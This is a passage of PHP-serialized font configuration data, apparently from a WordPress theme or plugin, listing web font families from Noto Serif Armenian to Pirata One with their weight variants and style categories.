Armenian\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:19:\"Noto Serif Balinese\";a:3:{s:5:\"label\";s:19:\"Noto Serif Balinese\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:18:\"Noto Serif Bengali\";a:3:{s:5:\"label\";s:18:\"Noto Serif Bengali\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:21:\"Noto Serif Devanagari\";a:3:{s:5:\"label\";s:21:\"Noto Serif Devanagari\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:18:\"Noto Serif Display\";a:3:{s:5:\"label\";s:18:\"Noto Serif Display\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:16:\"Noto Serif Dogra\";a:3:{s:5:\"label\";s:16:\"Noto Serif Dogra\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:19:\"Noto Serif Ethiopic\";a:3:{s:5:\"label\";s:19:\"Noto Serif Ethiopic\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:19:\"Noto Serif Georgian\";a:3:{s:5:\"label\";s:19:\"Noto Serif Georgian\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:18:\"Noto Serif Grantha\";a:3:{s:5:\"label\";s:18:\"Noto Serif Grantha\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:19:\"Noto Serif Gujarati\";a:3:{s:5:\"label\";s:19:\"Noto Serif Gujarati\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:19:\"Noto Serif Gurmukhi\";a:3:{s:5:\"label\";s:19:\"Noto Serif Gurmukhi\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:17:\"Noto Serif Hebrew\";a:3:{s:5:\"label\";s:17:\"Noto Serif Hebrew\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:13:\"Noto Serif JP\";a:3:{s:5:\"label\";s:13:\"Noto Serif JP\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"900\";i:6;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:13:\"Noto Serif KR\";a:3:{s:5:\"label\";s:13:\"Noto Serif KR\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"900\";i:6;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:18:\"Noto Serif Kannada\";a:3:{s:5:\"label\";s:18:\"Noto Serif Kannada\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:16:\"Noto Serif Khmer\";a:3:{s:5:\"label\";s:16:\"Noto Serif Khmer\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:14:\"Noto Serif Lao\";a:3:{s:5:\"label\";s:14:\"Noto Serif Lao\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:20:\"Noto Serif Malayalam\";a:3:{s:5:\"label\";s:20:\"Noto Serif Malayalam\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:18:\"Noto Serif Myanmar\";a:3:{s:5:\"label\";s:18:\"Noto Serif Myanmar\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:33:\"Noto Serif Nyiakeng Puachue Hmong\";a:3:{s:5:\"label\";s:33:\"Noto Serif Nyiakeng Puachue Hmong\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:13:\"Noto Serif SC\";a:3:{s:5:\"label\";s:13:\"Noto Serif SC\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"900\";i:6;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:18:\"Noto Serif Sinhala\";a:3:{s:5:\"label\";s:18:\"Noto Serif Sinhala\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:13:\"Noto Serif TC\";a:3:{s:5:\"label\";s:13:\"Noto Serif TC\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"900\";i:6;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:16:\"Noto Serif Tamil\";a:3:{s:5:\"label\";s:16:\"Noto Serif Tamil\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:17:\"Noto Serif Tangut\";a:3:{s:5:\"label\";s:17:\"Noto Serif Tangut\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:17:\"Noto Serif Telugu\";a:3:{s:5:\"label\";s:17:\"Noto Serif Telugu\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:15:\"Noto Serif Thai\";a:3:{s:5:\"label\";s:15:\"Noto Serif Thai\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:18:\"Noto Serif Tibetan\";a:3:{s:5:\"label\";s:18:\"Noto Serif Tibetan\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:17:\"Noto Serif Yezidi\";a:3:{s:5:\"label\";s:17:\"Noto Serif Yezidi\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:22:\"Noto Traditional Nushu\";a:3:{s:5:\"label\";s:22:\"Noto Traditional Nushu\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Nova Cut\";a:3:{s:5:\"label\";s:8:\"Nova Cut\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Nova Flat\";a:3:{s:5:\"label\";s:9:\"Nova Flat\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Nova Mono\";a:3:{s:5:\"label\";s:9:\"Nova Mono\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:9:\"Nova Oval\";a:3:{s:5:\"label\";s:9:\"Nova Oval\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Nova Round\";a:3:{s:5:\"label\";s:10:\"Nova Round\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Nova Script\";a:3:{s:5:\"label\";s:11:\"Nova Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Nova Slim\";a:3:{s:5:\"label\";s:9:\"Nova Slim\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Nova Square\";a:3:{s:5:\"label\";s:11:\"Nova Square\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Numans\";a:3:{s:5:\"label\";s:6:\"Numans\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Nunito\";a:3:{s:5:\"label\";s:6:\"Nunito\";s:8:\"variants\";a:16:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:3:\"800\";i:11;s:9:\"800italic\";i:12;s:3:\"900\";i:13;s:9:\"900italic\";i:14;s:6:\"italic\";i:15;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Nunito Sans\";a:3:{s:5:\"label\";s:11:\"Nunito Sans\";s:8:\"variants\";a:14:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:3:\"800\";i:9;s:9:\"800italic\";i:10;s:3:\"900\";i:11;s:9:\"900italic\";i:12;s:6:\"italic\";i:13;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Odibee Sans\";a:3:{s:5:\"label\";s:11:\"Odibee Sans\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:14:\"Odor Mean Chey\";a:3:{s:5:\"label\";s:14:\"Odor Mean Chey\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Offside\";a:3:{s:5:\"label\";s:7:\"Offside\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:2:\"Oi\";a:3:{s:5:\"label\";s:2:\"Oi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:15:\"Old Standard TT\";a:3:{s:5:\"label\";s:15:\"Old Standard TT\";s:8:\"variants\";a:3:{i:0;s:3:\"700\";i:1;s:6:\"italic\";i:2;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"Oldenburg\";a:3:{s:5:\"label\";s:9:\"Oldenburg\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:3:\"Ole\";a:3:{s:5:\"label\";s:3:\"Ole\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:11:\"Oleo Script\";a:3:{s:5:\"label\";s:11:\"Oleo Script\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:22:\"Oleo Script Swash Caps\";a:3:{s:5:\"label\";s:22:\"Oleo Script Swash Caps\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Oooh Baby\";a:3:{s:5:\"label\";s:9:\"Oooh Baby\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"Open Sans\";a:3:{s:5:\"label\";s:9:\"Open Sans\";s:8:\"variants\";a:12:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"500\";i:3;s:9:\"500italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:3:\"800\";i:9;s:9:\"800italic\";i:10;s:6:\"italic\";i:11;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:19:\"Open Sans Condensed\";a:3:{s:5:\"label\";s:19:\"Open Sans Condensed\";s:8:\"variants\";a:3:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"700\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Oranienbaum\";a:3:{s:5:\"label\";s:11:\"Oranienbaum\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Orbitron\";a:3:{s:5:\"label\";s:8:\"Orbitron\";s:8:\"variants\";a:6:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:3:\"900\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Oregano\";a:3:{s:5:\"label\";s:7:\"Oregano\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Orelega One\";a:3:{s:5:\"label\";s:11:\"Orelega One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Orienta\";a:3:{s:5:\"label\";s:7:\"Orienta\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Original Surfer\";a:3:{s:5:\"label\";s:15:\"Original Surfer\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Oswald\";a:3:{s:5:\"label\";s:6:\"Oswald\";s:8:\"variants\";a:6:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Otomanopee One\";a:3:{s:5:\"label\";s:14:\"Otomanopee One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Outfit\";a:3:{s:5:\"label\";s:6:\"Outfit\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Over the Rainbow\";a:3:{s:5:\"label\";s:16:\"Over the Rainbow\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:8:\"Overlock\";a:3:{s:5:\"label\";s:8:\"Overlock\";s:8:\"variants\";a:6:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:3:\"900\";i:3;s:9:\"900italic\";i:4;s:6:\"italic\";i:5;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Overlock SC\";a:3:{s:5:\"label\";s:11:\"Overlock SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Overpass\";a:3:{s:5:\"label\";s:8:\"Overpass\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"Overpass Mono\";a:3:{s:5:\"label\";s:13:\"Overpass Mono\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:3:\"Ovo\";a:3:{s:5:\"label\";s:3:\"Ovo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Oxanium\";a:3:{s:5:\"label\";s:7:\"Oxanium\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Oxygen\";a:3:{s:5:\"label\";s:6:\"Oxygen\";s:8:\"variants\";a:3:{i:0;s:3:\"300\";i:1;s:3:\"700\";i:2;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Oxygen Mono\";a:3:{s:5:\"label\";s:11:\"Oxygen Mono\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:7:\"PT Mono\";a:3:{s:5:\"label\";s:7:\"PT Mono\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:7:\"PT Sans\";a:3:{s:5:\"label\";s:7:\"PT Sans\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"PT Sans Caption\";a:3:{s:5:\"label\";s:15:\"PT Sans Caption\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"PT Sans Narrow\";a:3:{s:5:\"label\";s:14:\"PT Sans Narrow\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"PT Serif\";a:3:{s:5:\"label\";s:8:\"PT Serif\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:16:\"PT Serif Caption\";a:3:{s:5:\"label\";s:16:\"PT Serif Caption\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Pacifico\";a:3:{s:5:\"label\";s:8:\"Pacifico\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Padauk\";a:3:{s:5:\"label\";s:6:\"Padauk\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Palanquin\";a:3:{s:5:\"label\";s:9:\"Palanquin\";s:8:\"variants\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Palanquin Dark\";a:3:{s:5:\"label\";s:14:\"Palanquin Dark\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Palette Mosaic\";a:3:{s:5:\"label\";s:14:\"Palette Mosaic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Pangolin\";a:3:{s:5:\"label\";s:8:\"Pangolin\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Paprika\";a:3:{s:5:\"label\";s:7:\"Paprika\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Parisienne\";a:3:{s:5:\"label\";s:10:\"Parisienne\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:11:\"Passero One\";a:3:{s:5:\"label\";s:11:\"Passero One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Passion One\";a:3:{s:5:\"label\";s:11:\"Passion One\";s:8:\"variants\";a:3:{i:0;s:3:\"700\";i:1;s:3:\"900\";i:2;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:17:\"Passions Conflict\";a:3:{s:5:\"label\";s:17:\"Passions Conflict\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:18:\"Pathway Gothic One\";a:3:{s:5:\"label\";s:18:\"Pathway Gothic One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Patrick Hand\";a:3:{s:5:\"label\";s:12:\"Patrick Hand\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:15:\"Patrick Hand SC\";a:3:{s:5:\"label\";s:15:\"Patrick Hand SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Pattaya\";a:3:{s:5:\"label\";s:7:\"Pattaya\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Patua One\";a:3:{s:5:\"label\";s:9:\"Patua One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Pavanam\";a:3:{s:5:\"label\";s:7:\"Pavanam\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Paytone One\";a:3:{s:5:\"label\";s:11:\"Paytone One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Peddana\";a:3:{s:5:\"label\";s:7:\"Peddana\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Peralta\";a:3:{s:5:\"label\";s:7:\"Peralta\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:16:\"Permanent Marker\";a:3:{s:5:\"label\";s:16:\"Permanent Marker\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:8:\"Petemoss\";a:3:{s:5:\"label\";s:8:\"Petemoss\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:19:\"Petit Formal Script\";a:3:{s:5:\"label\";s:19:\"Petit Formal Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Petrona\";a:3:{s:5:\"label\";s:7:\"Petrona\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:11:\"Philosopher\";a:3:{s:5:\"label\";s:11:\"Philosopher\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Piazzolla\";a:3:{s:5:\"label\";s:9:\"Piazzolla\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:6:\"Piedra\";a:3:{s:5:\"label\";s:6:\"Piedra\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:13:\"Pinyon Script\";a:3:{s:5:\"label\";s:13:\"Pinyon Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:10:\"Pirata One\";a:3:{s:5:\"label\";s:10:\"Pirata 